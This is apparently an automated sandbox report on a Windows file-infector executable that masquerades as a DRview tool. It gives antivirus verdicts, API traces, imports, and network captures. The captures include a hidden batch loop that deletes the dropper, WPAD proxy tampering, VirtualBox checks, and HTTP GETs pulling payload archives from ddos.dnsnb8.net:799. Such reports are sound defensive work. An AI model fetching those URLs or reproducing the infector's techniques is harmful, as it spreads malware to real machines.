Score: 6.2
Risk level: High

SHA-256: a4d76ac4802ac60c244c1478b370bf564afab3914959cda8e69fbb10342f2852

File name: cdd1c6c1f93fbaa618e330c4d41d98da.exe

Analysis duration: 30s

Last analysis:

File size: 515.5KB

Flagged by static analysis; flagged by dynamic analysis. Tags: AI SCORE=85 BANLOAD CLASSIC CONFIDENCE CSTQAJ DARKSHELL DUMPMODULEINFECTIOUSNME FAMVT FILEINFECTOR HIGH CONFIDENCE INFECTED JADTRE KA@558NXG KUDJ LOADER M1R5 MALICIOUS PE MIKCER NIMNUL OTWYCAL PATCHLOAD PCARRIER R + W32 RAMNIT ROUE SCORE SMALL STATIC AI UNSAFE VJADTRE WALI WAPOMI
Hawkeye engine
Not detected: no Hawkeye engine result is available for this sample.
Static verdict
Antivirus engines
Engine Result Scan date Engine version
McAfee W32/Kudj 20201211 6.0.6.653
Alibaba Virus:Win32/Nimnul.379f46ac 20190527 0.3.0.5
CrowdStrike win/malicious_confidence_90% (W) 20190702 1.0
Baidu Win32.Virus.Otwycal.d 20190318 1.0.0.2
Avast Other:Malware-gen [Trj] 20201210 21.1.5827.0
Tencent Virus.Win32.Loader.aab 20201211 1.0.0.1
Kingsoft 20201211 2017.9.26.565
Static indicators
Command line console output was observed (50 out of 674 events)
Time & API Arguments Status Return Repeated
1619910853.530372
WriteConsoleA
buffer: Usage:
console_handle: 0x0000000b
success 1 0
1619910853.530372
WriteConsoleA
buffer: DRview [-help] [-pid n] [-exe name] [-listdr] [-listall] [-listdlls] [-showdlls] [-nopid] [-no32] [-out file] [-cmdline] [-showmem] [-showtime] [-nobuildnum] [-qname strip] [-noqnames] [-hot_patch] [-s n] [-tillidle] [-idlecpu c] [-showmemfreq f] [-idleafter s] [-v]
console_handle: 0x0000000b
success 1 0
1619935750.662625
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619935750.662625
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619935750.662625
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe"
console_handle: 0x00000007
success 1 0
1619935750.725625
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe
console_handle: 0x00000007
success 1 0
1619935750.756625
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619935750.756625
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619935750.772625
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619935750.772625
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe"
console_handle: 0x00000007
success 1 0
1619935750.772625
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619935750.772625
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619935750.803625
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619935750.803625
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619935750.803625
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe"
console_handle: 0x00000007
success 1 0
1619935750.819625
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe
console_handle: 0x00000007
success 1 0
1619935750.834625
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619935750.834625
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619935750.834625
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619935750.834625
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe"
console_handle: 0x00000007
success 1 0
1619935750.834625
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619935750.834625
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619935750.850625
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619935750.850625
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619935750.850625
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe"
console_handle: 0x00000007
success 1 0
1619935750.865625
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe
console_handle: 0x00000007
success 1 0
1619935750.865625
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619935750.865625
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619935750.881625
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619935750.881625
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe"
console_handle: 0x00000007
success 1 0
1619935750.881625
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619935750.881625
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619935750.881625
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619935750.881625
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619935750.881625
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe"
console_handle: 0x00000007
success 1 0
1619935750.897625
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe
console_handle: 0x00000007
success 1 0
1619935750.912625
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619935750.912625
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619935750.928625
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619935750.928625
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe"
console_handle: 0x00000007
success 1 0
1619935750.928625
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619935750.928625
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619935750.944625
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619935750.944625
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619935750.959625
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe"
console_handle: 0x00000007
success 1 0
1619935750.990625
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe
console_handle: 0x00000007
success 1 0
1619935750.990625
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619935751.006625
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619935751.006625
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619935751.006625
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe"
console_handle: 0x00000007
success 1 0
This executable has a PDB path (1 event)
pdb_path D:\derek\dr\build_package\build_drmemory-release-32\dynamorio\bin32\DRview.pdb
Tries to locate where the browsers are installed (1 event)
file C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)
section )nE\xe0\xa3u4
Behavioral verdict
Dynamic indicators
Creates executable files on the filesystem (21 events)
file C:\Python27\Lib\distutils\command\wininst-6.0.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\02810883.exe
file C:\Python27\Lib\site-packages\setuptools\cli-32.exe
file C:\Python27\Lib\site-packages\pip\_vendor\distlib\w32.exe
file C:\Python27\Lib\site-packages\setuptools\cli.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\522601A9.exe
file C:\tmpsij43m\bin\inject-x86.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\74081757.exe
file C:\Python27\Lib\site-packages\setuptools\gui-32.exe
file C:\Python27\Lib\distutils\command\wininst-8.0.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\14A03C05.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\30436BFB.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\FTngrh.exe
file C:\Python27\Lib\distutils\command\wininst-7.1.exe
file C:\Python27\Lib\distutils\command\wininst-9.0.exe
file C:\tmpsij43m\bin\is32bit.exe
file C:\Python27\Lib\site-packages\setuptools\gui.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\5DCE3ECC.exe
file C:\tmpsij43m\bin\execsc.exe
file C:\Python27\Lib\site-packages\pip\_vendor\distlib\t32.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\24631e31.bat
Drops a binary and executes it (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\24631e31.bat
Drops an executable to the user AppData folder (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\FTngrh.exe
A process created a hidden window (1 event)
Time & API Arguments Status Return Repeated
1619935750.240125
ShellExecuteExW
parameters:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\24631e31.bat
filepath_r: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\24631e31.bat
show_type: 0
success 1 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 event)
Time & API Arguments Status Return Repeated
1619935743.256125
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
The binary likely contains encrypted or compressed data indicative of a packer (1 event)
entropy 6.934363183371124 section {'size_of_data': '0x00004200', 'virtual_address': '0x00083000', 'entropy': 6.934363183371124, 'name': ')nE\\xe0\\xa3u4', 'virtual_size': '0x00005000'} description A section with a high entropy has been found
Network communication
Communicates with host for which no DNS query was performed (1 event)
host 172.217.24.14
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (15 events)
Time & API Arguments Status Return Repeated
1619935745.819125
RegSetValueExA
key_handle: 0x000003e4
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619935745.819125
RegSetValueExA
key_handle: 0x000003e4
value: °&E’ä>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619935745.819125
RegSetValueExA
key_handle: 0x000003e4
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619935745.819125
RegSetValueExW
key_handle: 0x000003e4
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619935745.819125
RegSetValueExA
key_handle: 0x000003f4
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619935745.819125
RegSetValueExA
key_handle: 0x000003f4
value: °&E’ä>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619935745.834125
RegSetValueExA
key_handle: 0x000003f4
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619935745.881125
RegSetValueExW
key_handle: 0x000003ec
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
1619935746.537125
RegSetValueExA
key_handle: 0x00000404
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619935746.537125
RegSetValueExA
key_handle: 0x00000404
value: µ²’ä>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619935746.537125
RegSetValueExA
key_handle: 0x00000404
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619935746.537125
RegSetValueExW
key_handle: 0x00000404
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619935746.537125
RegSetValueExA
key_handle: 0x00000408
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619935746.537125
RegSetValueExA
key_handle: 0x00000408
value: µ²’ä>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619935746.537125
RegSetValueExA
key_handle: 0x00000408
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
Detects VirtualBox through the presence of a file (5 events)
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxControl.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxTray.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxDrvInst.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxWHQLFake.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\uninst.exe
File has been identified by 63 AntiVirus engines on VirusTotal as malicious (50 out of 63 events)
Bkav W32.FamVT.DumpModuleInfectiousNME.PE
Elastic malicious (high confidence)
MicroWorld-eScan Win32.VJadtre.3
FireEye Generic.mg.cdd1c6c1f93fbaa6
McAfee W32/Kudj
Cylance Unsafe
Zillya Virus.Nimnul.Win32.5
Sangfor Malware
K7AntiVirus Virus ( 0040f7441 )
Alibaba Virus:Win32/Nimnul.379f46ac
K7GW Virus ( 0040f7441 )
CrowdStrike win/malicious_confidence_90% (W)
Arcabit Win32.VJadtre.3
Baidu Win32.Virus.Otwycal.d
Cyren W32/PatchLoad.E
Symantec W32.Wapomi.C!inf
TotalDefense Win32/Nimnul.A
APEX Malicious
Paloalto generic.ml
ClamAV Win.Trojan.Downloader-64720
Kaspersky Virus.Win32.Nimnul.f
BitDefender Win32.VJadtre.3
NANO-Antivirus Trojan.Win32.Banload.cstqaj
AegisLab Virus.Win32.Nimnul.m1R5
Avast Other:Malware-gen [Trj]
Tencent Virus.Win32.Loader.aab
Ad-Aware Win32.VJadtre.3
TACHYON Virus/W32.Ramnit.C
Sophos Mal/Generic-R + W32/Nimnul-A
Comodo Virus.Win32.Wali.KA@558nxg
F-Secure Malware.W32/Jadtre.B
DrWeb BackDoor.Darkshell.246
VIPRE Virus.Win32.Small.acea (v)
TrendMicro PE_WAPOMI.BM
McAfee-GW-Edition BehavesLike.Win32.Infected.hm
Emsisoft Win32.VJadtre.3 (B)
SentinelOne Static AI - Malicious PE
Jiangmin Win32/Nimnul.f
Avira W32/Jadtre.B
Antiy-AVL Virus/Win32.Nimnul.f
Gridinsoft Trojan.Heur!.03002201
Microsoft Virus:Win32/Mikcer.B
ViRobot Win32.Ramnit.F
ZoneAlarm Virus.Win32.Nimnul.f
GData Win32.Virus.Wapomi.A
Cynet Malicious (score: 100)
AhnLab-V3 Win32/VJadtre.Gen
BitDefenderTheta AI:FileInfector.991137D00F
ALYac Win32.VJadtre.3
MAX malware (ai score=85)
Visual analysis
Binary image
No binary image: no binary visualization image was generated for this sample.
Runtime screenshots
No runtime screenshots: no screenshots were captured while the sample ran.

PE Compile Time

2016-08-29 15:12:06

Imports

Library ADVAPI32.dll:
0x47c354 OpenProcessToken
0x47c358 OpenThreadToken
0x47c368 RegDeleteKeyW
0x47c36c RegCloseKey
0x47c370 RegCreateKeyExW
0x47c374 FreeSid
0x47c378 SetEntriesInAclW
0x47c380 LookupAccountNameW
0x47c384 AddAccessAllowedAce
0x47c388 InitializeAcl
0x47c38c GetLengthSid
0x47c390 RegSetKeySecurity
0x47c3a4 RegOpenKeyExW
0x47c3a8 GetSecurityInfo
0x47c3ac RegEnumKeyExW
0x47c3b0 RegEnumValueW
0x47c3b4 RegDeleteValueW
0x47c3b8 RegQueryValueExW
0x47c3bc RegSetValueExW
0x47c3c0 RegOpenKeyW
0x47c3c4 CloseEventLog
0x47c3c8 ReadEventLogW
0x47c3d8 OpenEventLogW
0x47c3dc ClearEventLogW
Library KERNEL32.dll:
0x47c428 GetProcAddress
0x47c42c GetModuleHandleW
0x47c430 Sleep
0x47c434 GetLastError
0x47c438 ReadProcessMemory
0x47c43c CloseHandle
0x47c440 OpenProcess
0x47c444 TerminateProcess
0x47c448 SleepEx
0x47c44c GetCurrentProcess
0x47c450 GetCurrentThread
0x47c454 FindClose
0x47c458 FindFirstFileW
0x47c45c MoveFileExW
0x47c460 MoveFileW
0x47c464 DeleteFileW
0x47c468 LocalFree
0x47c46c GetShortPathNameW
0x47c470 GetSystemDirectoryW
0x47c474 CreateDirectoryW
0x47c478 RemoveDirectoryW
0x47c47c FindNextFileW
0x47c480 LocalAlloc
0x47c484 GetExitCodeProcess
0x47c488 WaitForSingleObject
0x47c48c CreateProcessW
0x47c490 CopyFileW
0x47c494 ResumeThread
0x47c498 GetThreadContext
0x47c49c CreateThread
0x47c4a0 VirtualFreeEx
0x47c4a4 WriteProcessMemory
0x47c4a8 VirtualProtectEx
0x47c4ac VirtualAllocEx
0x47c4b0 CreateRemoteThread
0x47c4b4 CreateFileW
0x47c4bc FormatMessageW
0x47c4c0 LoadLibraryExW
0x47c4c4 CreateEventW
0x47c4c8 GetCurrentProcessId
0x47c4cc HeapFree
0x47c4d0 HeapAlloc
0x47c4d4 GetProcessHeap
0x47c4d8 WriteConsoleW
0x47c4dc GetFileType
0x47c4e0 GetStdHandle
0x47c4e4 GetModuleFileNameW
0x47c4e8 ExitProcess
0x47c4ec DecodePointer
0x47c4f8 GetCommandLineA
0x47c4fc HeapSetInformation
0x47c500 GetStringTypeW
0x47c504 MultiByteToWideChar
0x47c508 ReadFile
0x47c514 IsDebuggerPresent
0x47c518 EncodePointer
0x47c520 LoadLibraryW
0x47c52c FatalAppExitA
0x47c530 FreeLibrary
0x47c534 InterlockedExchange
0x47c538 GetLocaleInfoW
0x47c53c TlsAlloc
0x47c540 TlsGetValue
0x47c544 TlsSetValue
0x47c548 TlsFree
0x47c550 SetLastError
0x47c554 GetCurrentThreadId
0x47c55c WriteFile
0x47c560 SetHandleCount
0x47c564 GetStartupInfoW
0x47c568 WideCharToMultiByte
0x47c56c GetConsoleCP
0x47c570 GetConsoleMode
0x47c574 FlushFileBuffers
0x47c578 RtlUnwind
0x47c57c GetModuleFileNameA
0x47c588 HeapCreate
0x47c58c HeapDestroy
0x47c594 GetTickCount
0x47c5a0 GetCPInfo
0x47c5a4 GetACP
0x47c5a8 GetOEMCP
0x47c5ac IsValidCodePage
0x47c5b0 LCMapStringW
0x47c5b4 SetStdHandle
0x47c5b8 SetFilePointer
0x47c5bc SetEndOfFile
0x47c5c0 HeapSize
0x47c5c4 HeapReAlloc
0x47c5c8 CreateFileA
0x47c5cc GetUserDefaultLCID
0x47c5d0 GetLocaleInfoA
0x47c5d4 EnumSystemLocalesA
0x47c5d8 IsValidLocale

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49179 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49180 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49181 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49182 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49183 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49184 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49185 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49186 63.251.106.25 ddos.dnsnb8.net 799

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 51378 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58368 239.255.255.250 3702
192.168.56.101 58371 239.255.255.250 3702
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://ddos.dnsnb8.net:799/cj//k1.rar
GET /cj//k1.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive

http://ddos.dnsnb8.net:799/cj//k3.rar
GET /cj//k3.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive

http://ddos.dnsnb8.net:799/cj//k2.rar
GET /cj//k2.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive

http://ddos.dnsnb8.net:799/cj//k5.rar
GET /cj//k5.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive

http://ddos.dnsnb8.net:799/cj//k4.rar
GET /cj//k4.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.